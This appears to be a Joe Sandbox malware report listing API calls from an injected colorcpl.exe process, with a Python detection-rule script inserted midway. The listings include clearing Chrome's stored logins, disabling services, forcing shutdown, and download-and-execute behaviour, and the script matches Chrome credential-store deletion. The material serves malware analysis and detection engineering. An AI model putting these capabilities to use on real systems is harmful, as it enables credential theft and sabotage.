                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                              • Opcode ID: f9db417b3b29f015369b13c257529082d6d328e6c8887f011236a02af627e9cd
                                                                                                                              • Instruction ID: c07b336aba90a8bc29dcfa5f0eb3db7b2b7db025410c265d83157236d313652c
                                                                                                                              • Opcode Fuzzy Hash: f9db417b3b29f015369b13c257529082d6d328e6c8887f011236a02af627e9cd
                                                                                                                              • Instruction Fuzzy Hash: E4014271EC0106ABDB047B79DC6BCFD7768ED22904B40111DE443D3290FD527955DAD6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0467795F
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 04677966
                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04677978
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04677997
                                                                                                                              • GetLastError.KERNEL32 ref: 0467799D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                              • Opcode ID: 9f3a09fe8fd4c38ffcb35780e6fb33315b6b48d50c7e2645103ae7be6c2c2e56
                                                                                                                              • Instruction ID: 041822029a5ab765b48970b224063951b1011bc703bf8cfd40d51c659e2c796d
                                                                                                                              • Opcode Fuzzy Hash: 9f3a09fe8fd4c38ffcb35780e6fb33315b6b48d50c7e2645103ae7be6c2c2e56
                                                                                                                              • Instruction Fuzzy Hash: 47F0DAB1905129ABDB10ABA1ED4DEEF7FBCEF05715F100154BA09A1140E6785E48CAF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 04669258
                                                                                                                                • Part of subcall function 046648C8: connect.WS2_32(?,?,?), ref: 046648E0
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 046692F4
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 04669352
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 046693AA
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 046693C1
                                                                                                                                • Part of subcall function 04664E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E38
                                                                                                                                • Part of subcall function 04664E26: SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E43
                                                                                                                                • Part of subcall function 04664E26: CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E4C
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 046695B9
                                                                                                                                • Part of subcall function 04664AA1: WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                                • Part of subcall function 04664AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1824512719-0
                                                                                                                              • Opcode ID: e4dd40e17818d15c8d4dc6371d81b8eec721201278862a47b02792221b2e735a
                                                                                                                              • Instruction ID: d8b29311cddfdf88360c450f9458f7ae54d0ae56227a6742fa8b54d2b58f6e20
                                                                                                                              • Opcode Fuzzy Hash: e4dd40e17818d15c8d4dc6371d81b8eec721201278862a47b02792221b2e735a
                                                                                                                              • Instruction Fuzzy Hash: 4CB16D72900118ABEB14FBA0DD95AEDB7B9AF14318F10415DE807A7190FF30BB49CB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0467A38E,00000000), ref: 0467AC88
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0467A38E,00000000), ref: 0467AC9C
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACA9
                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0467A38E,00000000), ref: 0467ACDE
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACF0
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0467A38E,00000000), ref: 0467ACF3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 493672254-0
                                                                                                                              • Opcode ID: 20a922526e8fb65cf02e9b4243fc48a8c861bb00910f42680bdfa66c9eccdf94
                                                                                                                              • Instruction ID: dc06c5116110d686f9660769b787a00ecf2d4e4578f5f0608f0eab5d74d3b755
                                                                                                                              • Opcode Fuzzy Hash: 20a922526e8fb65cf02e9b4243fc48a8c861bb00910f42680bdfa66c9eccdf94
                                                                                                                              • Instruction Fuzzy Hash: 9D01F5B11881247BE7105A789C4DEBE3F6CDB83370F10030DFA26962C0FA64AE49E5E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0467A6A0,00000000), ref: 0467AA53
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0467A6A0,00000000), ref: 0467AA68
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA75
                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0467A6A0,00000000), ref: 0467AA80
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA92
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0467A6A0,00000000), ref: 0467AA95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 276877138-0
                                                                                                                              • Opcode ID: 70b5e61aa63c2821801ae43c88e4f7da3487b88aff520d4fd122d0c99eebdd10
                                                                                                                              • Instruction ID: ab462d05e100fcf8530f1472c1818fc0739f4eff787f2192e01dd36cb8dbde56
                                                                                                                              • Opcode Fuzzy Hash: 70b5e61aa63c2821801ae43c88e4f7da3487b88aff520d4fd122d0c99eebdd10
                                                                                                                              • Instruction Fuzzy Hash: 3BF0B4B11055346FE3119B209C88DFF3AACDB86355B00001DF90682100FB789C89AAF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04677952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0467795F
                                                                                                                                • Part of subcall function 04677952: OpenProcessToken.ADVAPI32(00000000), ref: 04677966
                                                                                                                                • Part of subcall function 04677952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04677978
                                                                                                                                • Part of subcall function 04677952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04677997
                                                                                                                                • Part of subcall function 04677952: GetLastError.KERNEL32 ref: 0467799D
                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 04676856
                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0467686B
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04676872
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                              • Opcode ID: e88ffd0e410142796d872adc977657616c873e43ad7535a5026805eef46a57ec
                                                                                                                              • Instruction ID: 5ae3157520b5cfe0678fc027a17e45b65f736140eb5f5ac8eb5f84f9f2a083c2
                                                                                                                              • Opcode Fuzzy Hash: e88ffd0e410142796d872adc977657616c873e43ad7535a5026805eef46a57ec
                                                                                                                              • Instruction Fuzzy Hash: 3D215EA17043059BFF14FBB5D8699FE229DDF52658F40081DA10397682FE78FC0987A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

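Three of the function listings above map directly onto host telemetry: DeleteFileA on `\AppData\Local\Google\Chrome\User Data\Default\Login Data` (the "[Chrome StoredLogins found, cleared!]" path), ChangeServiceConfigW whose third argument, dwStartType, is 4 (SERVICE_DISABLED), and the SeShutdownPrivilege/ExitWindowsEx pair (with a fallback to SetSuspendState from PowrProf.dll). The script below is an added example, not part of the Joe Sandbox report or of the sample, showing how a detection engineer would turn those three behaviours into rules over Sysmon Event ID 23 (FileDelete) and the System log's 7040 (service start type changed) and 1074 (shutdown initiated) records. Every event record, path and service name in it is constructed for the example; only the event IDs and message shapes are real Windows conventions.

```python
"""
Added detection logic (not code from the Joe Sandbox report) for three
behaviours visible in the API listings above: a non-browser process
deleting Chrome's 'Login Data', a service start type being changed to
'disabled', and a shutdown initiated by a process that normally never
does so.  Events are dicts shaped like Sysmon Event ID 23 and System-log
7040 / 1074 records; every record below is constructed.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, object]

# Processes that legitimately rewrite Chrome's credential store.
BROWSER_IMAGES = {"chrome.exe"}
# Windows components that normally appear as the initiator in event 1074.
EXPECTED_SHUTDOWN_INITIATORS = {"shutdown.exe", "wininit.exe", "explorer.exe",
                                "svchost.exe", "tiworker.exe", "msiexec.exe"}

LOGIN_DATA_RE = re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.IGNORECASE)
SVC_7040_RE = re.compile(
    r"start type of the (?P<svc>.+?) service was changed from (?P<old>.+?) to (?P<new>.+?)\.?$",
    re.IGNORECASE)
SHUTDOWN_1074_RE = re.compile(r"^The process (?P<proc>.+?) \(", re.IGNORECASE)


def check_login_data_delete(ev: Event) -> Optional[str]:
    """Sysmon 23/26: Chrome 'Login Data' removed by something other than the browser."""
    if ev.get("source") != "Sysmon" or ev.get("id") not in (23, 26):
        return None
    target = str(ev.get("TargetFilename", ""))
    if not LOGIN_DATA_RE.search(target):
        return None
    image = str(ev.get("Image", ""))
    if ntpath.basename(image).lower() in BROWSER_IMAGES:
        return None
    return f"{image} deleted Chrome credential store {target}"


def check_service_disabled(ev: Event) -> Optional[str]:
    """System 7040: a service's start type was switched to 'disabled'."""
    if ev.get("source") != "System" or ev.get("id") != 7040:
        return None
    m = SVC_7040_RE.search(str(ev.get("Message", "")))
    if not m or m.group("new").strip().lower() != "disabled":
        return None
    return f"service '{m.group('svc')}' start type changed from {m.group('old')} to disabled"


def check_shutdown_initiator(ev: Event) -> Optional[str]:
    """System 1074: shutdown/restart requested by a process that normally never does so."""
    if ev.get("source") != "System" or ev.get("id") != 1074:
        return None
    m = SHUTDOWN_1074_RE.search(str(ev.get("Message", "")))
    if not m:
        return None
    proc = m.group("proc")
    if (ntpath.basename(proc).lower() in EXPECTED_SHUTDOWN_INITIATORS
            and proc.lower().startswith("c:\\windows\\")):
        return None
    return f"shutdown initiated by unexpected process {proc}"


RULES = [
    ("chrome_login_data_deleted", check_login_data_delete),
    ("service_start_type_disabled", check_service_disabled),
    ("shutdown_by_unexpected_process", check_shutdown_initiator),
]


def run_rules(events: List[Event]) -> List[Tuple[str, int, str]]:
    """Return (rule name, event index, detail) for every event that trips a rule."""
    alerts = []
    for idx, ev in enumerate(events):
        for name, rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append((name, idx, detail))
    return alerts


# Constructed sample events (not taken from the report): three malicious, three benign.
# colorcpl.exe is used as the image because the report's memory dump came from that process.
SAMPLE_EVENTS: List[Event] = [
    {"source": "Sysmon", "id": 23, "Image": r"C:\Windows\System32\colorcpl.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"source": "Sysmon", "id": 23, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal"},
    {"source": "System", "id": 7040,
     "Message": "The start type of the ExampleSvc service was changed from auto start to disabled."},
    {"source": "System", "id": 7040,
     "Message": "The start type of the ExampleSvc service was changed from auto start to demand start."},
    {"source": "System", "id": 1074,
     "Message": r"The process C:\Windows\System32\colorcpl.exe (HOST) has initiated the shutdown of computer HOST "
                r"on behalf of user HOST\user for the following reason: Other (Unplanned)"},
    {"source": "System", "id": 1074,
     "Message": r"The process C:\Windows\System32\shutdown.exe (HOST) has initiated the restart of computer HOST "
                r"on behalf of user HOST\admin for the following reason: Other (Planned)"},
]

if __name__ == "__main__":
    for name, idx, detail in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] event #{idx}: {detail}")
```

The first rule keys on the exact file name rather than the directory because Chrome itself rewrites `Login Data-journal` constantly; the third rule whitelists by basename only when the path is under `C:\Windows`, so a dropped `shutdown.exe` in a user directory still alerts. Note that the 1074 event is written regardless of whether the caller used ExitWindowsEx or SetSuspendState for hibernation, so the rule covers both branches seen in the listing.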
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,046B275B,?,00000000), ref: 046B24D5
                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,046B275B,?,00000000), ref: 046B24FE
                                                                                                                              • GetACP.KERNEL32(?,?,046B275B,?,00000000), ref: 046B2513
                                                                                                                              Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: d253482639a1f0b459acfa28551bba4daaec808f30637d57fe7ad08c5e62c25d
• Instruction ID: a61740ce20f2ce8ad1f17c6ffe8f8eab2bd8d07b3c0e43e39708e5da47ed5f56
• Opcode Fuzzy Hash: d253482639a1f0b459acfa28551bba4daaec808f30637d57fe7ad08c5e62c25d
• Instruction Fuzzy Hash: EE218132A10201A6E734CF54D928AEB73E6EB54B65B4685A4E989DB600F732FDC1C3D0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0467B4B9
• LoadResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4CD
• LockResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4D4
• SizeofResource.KERNEL32(00000000,?,?,0466F3DE,00000000), ref: 0467B4E3
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: dda9b77e11cbe1c50c9ecd1d179cc7f86a50be82d8850bee81abb306f4369962
• Instruction ID: 7c24617004b2d4579d0f8ac60ec063b5777a9c0a0909fc91efa3887e721138e7
• Opcode Fuzzy Hash: dda9b77e11cbe1c50c9ecd1d179cc7f86a50be82d8850bee81abb306f4369962
• Instruction Fuzzy Hash: 4CE01AB6601310ABCB251BA5EC4CD463F29F7CAB6230010A5F70296350E6398C45EAA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0466966A
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 046696E2
• FindNextFileW.KERNEL32(00000000,?), ref: 0466970B
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04669722
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: 664bbf6c6ca2a59a6a633dda5db81ec12fe92300741739ac91836ba45ceeee15
• Instruction ID: 36d7c2a0028725ed67ed2800a00c5439d5a37147cf1ddcc8d2de5a0f8090557b
• Opcode Fuzzy Hash: 664bbf6c6ca2a59a6a633dda5db81ec12fe92300741739ac91836ba45ceeee15
• Instruction Fuzzy Hash: 3281FD729001199BEB15EBA0DCA49EDB7B8AF15319F14426ED807A7190FF30BB49CB94
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
  • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
  • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
  • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
  • Part of subcall function 046A8215: _free.LIBCMT ref: 046A8274
  • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8281
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 046B271C
• IsValidCodePage.KERNEL32(00000000), ref: 046B2777
• IsValidLocale.KERNEL32(?,00000001), ref: 046B2786
• GetLocaleInfoW.KERNEL32(?,00001001,046A4A6C,00000040,?,046A4B8C,00000055,00000000,?,?,00000055,00000000), ref: 046B27CE
• GetLocaleInfoW.KERNEL32(?,00001002,046A4AEC,00000040), ref: 046B27ED
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: 060235a0cc39c23e1fc2f6741d4f2498c1ebd15b1eb97d99a05467b6f9714edf
• Instruction ID: fa1888743f7aa1c9a7ed3aba23c6f130a10348f0741c76016ec0967d25444881
• Opcode Fuzzy Hash: 060235a0cc39c23e1fc2f6741d4f2498c1ebd15b1eb97d99a05467b6f9714edf
• Instruction Fuzzy Hash: 96516271A00215ABEF20DFA4CC58AFA77F8FF19300F0444A9E994E7250F770A9858BE5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 04668811
• FindFirstFileW.KERNEL32(00000000,?,Function_00066608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688CA
• __CxxThrowException@8.LIBVCRUNTIME ref: 046688F2
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688FF
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04668A15
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: 1d13290a45fdb60b813cf7d13fb8031a047cf93b2c82495d30d4e2bc4b073cbd
• Instruction ID: 257e0b9cc3a69cb8c7aa503a9fe671cda824c421a341b8ef02c2d963211c46ed
• Opcode Fuzzy Hash: 1d13290a45fdb60b813cf7d13fb8031a047cf93b2c82495d30d4e2bc4b073cbd
• Instruction Fuzzy Hash: 1A513A72901209AAEF04FB74D9659ED77B8AF11349F50016DA80BA3190FF34BB49CB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04666FBC
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 046670A0
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\SysWOW64\colorcpl.exe$open
• API String ID: 2825088817-1189844230
• Opcode ID: 27f7e182f0840463267e7ff91a338309707ac3e9caa0cc0d372b2f8b3f9ab9d9
• Instruction ID: f924fd044f249f08c407e7c1454a5e1a440f216c4f2e53ddafcb06600dd899ec
• Opcode Fuzzy Hash: 27f7e182f0840463267e7ff91a338309707ac3e9caa0cc0d372b2f8b3f9ab9d9
• Instruction Fuzzy Hash: 1C61F171B04304ABEA24FB75C8659BE73A99F9264DF40091DE543572C1FE30FA09C7AA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0467CAD7
  • Part of subcall function 0467376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0467377E
  • Part of subcall function 0467376F: RegSetValueExA.KERNEL32(?,046C74B8,00000000,?,00000000,00000000,046D52F0,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737A6
  • Part of subcall function 0467376F: RegCloseKey.ADVAPI32(?,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737B1
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 297ccedd3a6f61cd38b9aaa359d0fe4903a4653d34b6782e73382f329cd3dfff
• Instruction ID: 10c8f816f6a77a5e112c51fb7d99bdba7202298667e269db16b688ae588f0e58
• Opcode Fuzzy Hash: 297ccedd3a6f61cd38b9aaa359d0fe4903a4653d34b6782e73382f329cd3dfff
• Instruction Fuzzy Hash: E7116062F8020063E918757D8D3BF7E3802D356B11F84015CE90A3A7C5F8837A5156DA
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
  • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
  • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
  • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,046A4A73,?,?,?,?,046A44CA,?,00000004), ref: 046B1DBA
• _wcschr.LIBVCRUNTIME ref: 046B1E4A
• _wcschr.LIBVCRUNTIME ref: 046B1E58
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,046A4A73,00000000,046A4B93), ref: 046B1EFB
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 76e50daeecfa7913182e82c43a717c853aa0dbee19ed1f4573e7a19094e39c2e
• Instruction ID: 20c4ee6b6c221277fbd49e6234a8dee7588e0940abe74ad4edb472466ef66f72
• Opcode Fuzzy Hash: 76e50daeecfa7913182e82c43a717c853aa0dbee19ed1f4573e7a19094e39c2e
• Instruction Fuzzy Hash: 1261E771600605BAEB24AB34CCA5AF673ACEF06794F14046EE985D7280FB74F981C7E5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0469BC1A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0469BC24
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0000000A), ref: 0469BC31
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: d090a62d50b476dacb1a20645ea9a3a713c5983cf5f2ed89c4fcb043999defe5
• Instruction ID: b8a244d209afdee9c32e64b833704773baf343e239bda340d9035ab7640b8265
• Opcode Fuzzy Hash: d090a62d50b476dacb1a20645ea9a3a713c5983cf5f2ed89c4fcb043999defe5
• Instruction Fuzzy Hash: 4B31A2759012199BCB21DF64D98879DB7B8BF18710F5041DAE41CA7290EB74AF858F44
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,046934BF,00000034,?,?,00000000), ref: 04693849
• CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,04693552,00000000,?,00000000), ref: 0469385F
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,04693552,00000000,?,00000000,0467E251), ref: 04693871
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 218c3e1c9c89943e45419277cca26f706821de942030bf973399ea900c632edc
• Instruction ID: e91a0a98b75237324af3464cfc2a6fe66c82fcd71d12376746f1c99eb4d19633
                                                                                                                              • Opcode Fuzzy Hash: 218c3e1c9c89943e45419277cca26f706821de942030bf973399ea900c632edc
                                                                                                                              • Instruction Fuzzy Hash: 98E09231308210BAEF300E25AC08F563BA9EB89760F20053DF716E41D4F2A29C858694
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32D6
